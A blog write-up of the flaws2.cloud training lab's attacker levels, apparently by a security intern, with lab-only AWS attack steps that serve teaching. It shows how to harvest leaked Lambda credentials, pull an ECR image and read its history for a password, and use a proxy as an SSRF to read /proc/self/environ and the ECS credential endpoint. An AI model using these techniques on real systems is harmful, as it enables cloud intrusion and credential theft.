This post covers all the challenges I solved to learn cloud security as part of my intern tasks at Appsecco. I would like to thank my mentor, Riyaz Walikar, for guiding me as I learned and explored more about cloud security.

Getting started

Although all the challenges are beginner friendly, I would recommend going through these resources first:

- API gateway

- AWS ECR

- Containers on AWS Overview

- Proxy on an Amazon EC2 instance

Level 1

The hint given: “For this level, you’ll need to enter the correct PIN code. The correct PIN is 100 digits long, so brute-forcing it won’t help.”



Here is the client-side validation code for level 1. Now, let’s check where this data is being submitted.

<form name="myForm" action="https://2rfismmoo8.execute-api.us-east-1.amazonaws.com/default/level1" onsubmit="return validateForm()">

Here the form data is submitted to an AWS API Gateway endpoint. The API ID is “2rfismmoo8” and the stage name is “default”.
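To make the structure of that URL explicit, here is a minimal sketch that splits an API Gateway invoke URL into its parts. The function name `parse_api_gateway_url` is my own, and the sketch assumes the usual `<api-id>.execute-api.<region>.amazonaws.com/<stage>/<resource>` layout.

```python
from urllib.parse import urlparse


def parse_api_gateway_url(url: str) -> dict:
    """Split an API Gateway invoke URL into API ID, region, stage and resource."""
    parsed = urlparse(url)
    host_parts = (parsed.hostname or "").split(".")
    # Assumed host layout: <api-id>.execute-api.<region>.amazonaws.com
    if len(host_parts) != 5 or host_parts[1] != "execute-api":
        raise ValueError(f"not an API Gateway invoke URL: {url}")
    # The first path segment is the stage, the rest is the resource path.
    stage, _, resource = parsed.path.lstrip("/").partition("/")
    return {
        "api_id": host_parts[0],
        "region": host_parts[2],
        "stage": stage,
        "resource": "/" + resource,
    }


info = parse_api_gateway_url(
    "https://2rfismmoo8.execute-api.us-east-1.amazonaws.com/default/level1"
)
print(info)
```

Because the validation runs only in the browser, nothing stops us from sending requests to this endpoint directly.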



When I entered an input, the page redirected and showed an invalid input message. Next, let’s submit a string instead and see what happens. I tried this method because of this reference.



After entering the string, the endpoint returned a malformed input error. Digging into the error output revealed leaked AWS credentials. I configured them manually in ~/.aws/credentials. Let’s use them to list the S3 buckets.
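As a rough sketch of that manual step, the snippet below turns leaked environment variables into the text of a profile for ~/.aws/credentials. The variable names are the standard ones AWS Lambda sets; the values are placeholders, and the helper `build_profile` is hypothetical.

```python
import configparser
import io


def build_profile(env: dict, profile: str) -> str:
    """Render an AWS credentials-file section from leaked environment variables."""
    # interpolation=None so a '%' in a value is never treated specially.
    config = configparser.ConfigParser(interpolation=None)
    config[profile] = {
        "aws_access_key_id": env["AWS_ACCESS_KEY_ID"],
        "aws_secret_access_key": env["AWS_SECRET_ACCESS_KEY"],
        # Temporary role credentials are only valid together with the session token.
        "aws_session_token": env["AWS_SESSION_TOKEN"],
    }
    buffer = io.StringIO()
    config.write(buffer)
    return buffer.getvalue()


# Placeholder values, not real credentials.
leaked_env = {
    "AWS_ACCESS_KEY_ID": "ASIAEXAMPLEKEYID",
    "AWS_SECRET_ACCESS_KEY": "example-secret-key",
    "AWS_SESSION_TOKEN": "example-session-token",
}
profile_text = build_profile(leaked_env, "flaws2level1")
print(profile_text)
```

Appending the printed section to ~/.aws/credentials makes the profile usable with `--profile flaws2level1`.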



Opening the secret web page found in the bucket unlocked level 2. Now, just navigate to level 2.

Level 2 link

Level 2

The lesson learned from level 1: whereas EC2 instances obtain the credentials for their IAM roles from the metadata service at 169.254.169.254 (as you learned in flaws.cloud Level 5), AWS Lambda obtains those credentials from environment variables. Developers will often dump environment variables when error conditions occur in order to help them debug problems.

This is dangerous, as sensitive information can sometimes be found in environment variables. Another problem is that the IAM role had privileges to list the contents of a bucket, which it did not need for its operation. The best practice is to follow a least-privilege strategy by giving services only the minimal privileges in their IAM policies that they need to accomplish their purpose.
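On the defensive side, one way to avoid this kind of leak is to redact sensitive-looking variables before they ever reach an error message. The following is only a sketch: the marker list and the name `redact_env` are my own choices, not something taken from the challenge.

```python
# Substrings that suggest a variable holds a secret (an assumed, non-exhaustive list).
SENSITIVE_MARKERS = ("KEY", "SECRET", "TOKEN", "PASSWORD")


def redact_env(env: dict) -> dict:
    """Return a copy of env that is safer to include in debug output."""
    redacted = {}
    for name, value in env.items():
        if any(marker in name.upper() for marker in SENSITIVE_MARKERS):
            redacted[name] = "<redacted>"
        else:
            redacted[name] = value
    return redacted


# Placeholder environment resembling what a Lambda function might see.
sample_env = {
    "AWS_REGION": "us-east-1",
    "AWS_ACCESS_KEY_ID": "ASIAEXAMPLEKEYID",
    "AWS_SECRET_ACCESS_KEY": "example-secret-key",
    "AWS_SESSION_TOKEN": "example-session-token",
}
safe_env = redact_env(sample_env)
print(safe_env)
```

Redaction limits the damage of a verbose error handler, but it does not replace a least-privilege IAM policy.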

The hint for this level: the next level is running as a container at the next target. Just like S3 buckets, other resources on AWS can have open permissions. I’ll give you a hint that the ECR (Elastic Container Registry) is named “level2”.



The hint tells us that the service runs in a container and that its image is stored in an Elastic Container Registry (ECR) repository. Now, we need to list all the images in that registry.

dig level2-g9785tw8478k4awxtbox9kk3c5ka8iiz.flaws2.cloud

aws --profile flaws2level1 sts get-caller-identity

aws --profile flaws2level1 ecr list-images --repository-name "RepoName" --registry-id Acc-id
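The account ID needed for --registry-id can be read from the output of sts get-caller-identity. Here is a small sketch of that step. It assumes the registry lives in the same account as the leaked role, uses a made-up account ID in the sample JSON, and takes the repository name “level2” from the hint.

```python
import json


def account_id_from_identity(identity_json: str) -> str:
    """Extract the account ID from `aws sts get-caller-identity` JSON output."""
    return json.loads(identity_json)["Account"]


def list_images_command(profile: str, repository: str, account_id: str) -> list:
    """Build the argument list for `aws ecr list-images`."""
    return [
        "aws", "--profile", profile,
        "ecr", "list-images",
        "--repository-name", repository,
        "--registry-id", account_id,
    ]


# Sample output with a made-up account ID and role name.
sample_identity = json.dumps({
    "UserId": "AROAEXAMPLEID:level1",
    "Account": "123456789012",
    "Arn": "arn:aws:sts::123456789012:assumed-role/level1/level1",
})
account_id = account_id_from_identity(sample_identity)
command = list_images_command("flaws2level1", "level2", account_id)
print(" ".join(command))
```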



aws --profile part2-attacker-level1 --region us-east-1 ecr get-login





Now that we have the authorization token, we can log in to the registry with Docker, pull the image to our local system, run it, and inspect it and its history for any sensitive information.
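For context, an ECR authorization token is a base64-encoded `username:password` pair, where the username is `AWS`. The sketch below decodes such a token and builds a docker login command from it. The token and registry endpoint are fabricated placeholders. Note that `ecr get-login` exists only in AWS CLI v1; v2 offers `ecr get-login-password` instead.

```python
import base64


def decode_ecr_token(authorization_token: str) -> tuple:
    """Split a base64 ECR authorization token into (username, password)."""
    decoded = base64.b64decode(authorization_token).decode("utf-8")
    username, _, password = decoded.partition(":")
    return username, password


def docker_login_command(username: str, registry_endpoint: str) -> list:
    """Build a `docker login` command that reads the password from stdin."""
    return ["docker", "login", "--username", username,
            "--password-stdin", registry_endpoint]


# A fabricated token; a real one comes from the ECR authorization API.
fake_token = base64.b64encode(b"AWS:not-a-real-password").decode("ascii")
username, password = decode_ecr_token(fake_token)
login_command = docker_login_command(
    username, "https://123456789012.dkr.ecr.us-east-1.amazonaws.com"
)
print(" ".join(login_command))
```

Passing the password on stdin keeps it out of the shell history and the process list.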



Now, inspect the Docker image. The inspection output contains a lot of noise, so let’s take a look at the history too.

docker image ls

docker history IMAGE_ID

docker history shows the commands that were used to build each layer of the image. By default the lines are truncated; to see them in full, use the --no-trunc flag.
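Untruncated history can be long, so filtering it for credential-like keywords helps. This is a minimal sketch: the keyword list is my own guess at what is worth flagging, and the sample history lines are invented for illustration.

```python
import re

# Keywords that often appear next to secrets in build commands (assumed list).
SUSPICIOUS = re.compile(
    r"passw|secret|token|credential|api[_-]?key|htpasswd", re.IGNORECASE
)


def find_suspicious_lines(history_text: str) -> list:
    """Return the history lines that mention credential-like keywords."""
    return [
        line.strip()
        for line in history_text.splitlines()
        if SUSPICIOUS.search(line)
    ]


# Invented sample resembling `docker history --no-trunc` output.
sample_history = """\
/bin/sh -c #(nop)  CMD ["sh" "/var/www/html/start.sh"]
/bin/sh -c htpasswd -b -c /etc/nginx/.htpasswd example_user example_password
/bin/sh -c apt-get update
"""
hits = find_suspicious_lines(sample_history)
for hit in hits:
    print(hit)
```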



Enter the credentials found in the image history on the level 2 web page to access the next level.

Reference:

https://docs.aws.amazon.com/AmazonECR/latest/userguide/docker-pull-ecr-image.html

https://docs.aws.amazon.com/AmazonECR/latest/userguide/registry_auth.html

Level 3

The lesson learned from level 2: there are lots of other resources on AWS that can be public, but they are harder to brute-force because you have to include not only the name of the resource but also the account ID and region. They also can’t be searched with DNS records. However, it is still best to avoid having public resources.





The next hint: the container’s web server you got access to includes a simple proxy.

The screenshot from the previous challenge shows the proxy file.

curl 169.254.170.2/v2/credentials/9c3439c4-b560-4aac-aa62-f904a24a34e6

One of the hints tells us that we can also read local files with this proxy. Pretty cool, let’s see:

http://container.target.flaws2.cloud/proxy/file:///proc/self/environ

HOSTNAME=ip-172-31-50-59.ec2.internal

HOME=/root

AWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/6d7c28dc-ba85-4e97-aa1d-afef4a6c1f14

AWS_EXECUTION_ENV=AWS_ECS_FARGATE

AWS_DEFAULT_REGION=us-east-1

ECS_CONTAINER_METADATA_URI_V4=http://169.254.170.2/v4/00959a2671f6462e918bcd864e26f38a-3779599274

ECS_CONTAINER_METADATA_URI=http://169.254.170.2/v3/00959a2671f6462e918bcd864e26f38a-3779599274

PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

AWS_REGION=us-east-1

PWD=/
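The raw /proc/self/environ file separates entries with NUL bytes, which is why a browser shows them run together. A short sketch of how the dump can be parsed and turned into the credentials URL follows. The helper names are mine, and the sample bytes contain only a few of the variables shown above.

```python
ECS_CREDENTIALS_HOST = "http://169.254.170.2"
PROXY_PREFIX = "http://container.target.flaws2.cloud/proxy/"


def parse_environ(raw: bytes) -> dict:
    """Parse the NUL-separated contents of /proc/self/environ."""
    env = {}
    for entry in raw.split(b"\0"):
        if b"=" in entry:
            name, _, value = entry.partition(b"=")
            env[name.decode()] = value.decode()
    return env


def credentials_url(env: dict) -> str:
    """Build the ECS task credentials URL from the relative URI variable."""
    return ECS_CREDENTIALS_HOST + env["AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"]


# A subset of the dump above, with the NUL separators restored.
raw_environ = (
    b"HOME=/root\0"
    b"AWS_CONTAINER_CREDENTIALS_RELATIVE_URI="
    b"/v2/credentials/6d7c28dc-ba85-4e97-aa1d-afef4a6c1f14\0"
    b"AWS_REGION=us-east-1\0PWD=/\0"
)
env = parse_environ(raw_environ)
proxied_url = PROXY_PREFIX + credentials_url(env)
print(proxied_url)
```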

Let’s use the proxy to make the request:

http://container.target.flaws2.cloud/proxy/http://169.254.170.2/v2/credentials/6d7c28dc-ba85-4e97-aa1d-afef4a6c1f14



This request returns the AWS credentials. Now let’s configure them as a new AWS CLI profile in the terminal.
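To illustrate the configuration step, the sketch below maps the JSON fields of the response to `aws configure set` commands. The field names AccessKeyId, SecretAccessKey and Token are what the ECS credentials endpoint returns as far as I know; the values here are placeholders and the profile name matches the one used below.

```python
import json
import shlex

# Response field -> AWS CLI setting name.
FIELD_TO_SETTING = {
    "AccessKeyId": "aws_access_key_id",
    "SecretAccessKey": "aws_secret_access_key",
    "Token": "aws_session_token",
}


def configure_commands(credentials_json: str, profile: str) -> list:
    """Build `aws configure set` commands for each credential field."""
    credentials = json.loads(credentials_json)
    return [
        shlex.join(["aws", "configure", "set", setting,
                    credentials[field], "--profile", profile])
        for field, setting in FIELD_TO_SETTING.items()
    ]


# Placeholder response, not real credentials.
sample_response = json.dumps({
    "AccessKeyId": "ASIAEXAMPLEKEYID",
    "SecretAccessKey": "example-secret-key",
    "Token": "example-session-token",
})
commands = configure_commands(sample_response, "flaws2level3")
for line in commands:
    print(line)
```

The session token must be set along with the two keys, because these are temporary role credentials.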



Now, let’s list the S3 buckets using the newly created profile:

aws s3 ls --profile flaws2level3

THE END!

Get in touch on Twitter.

Happy hacking until next time 😇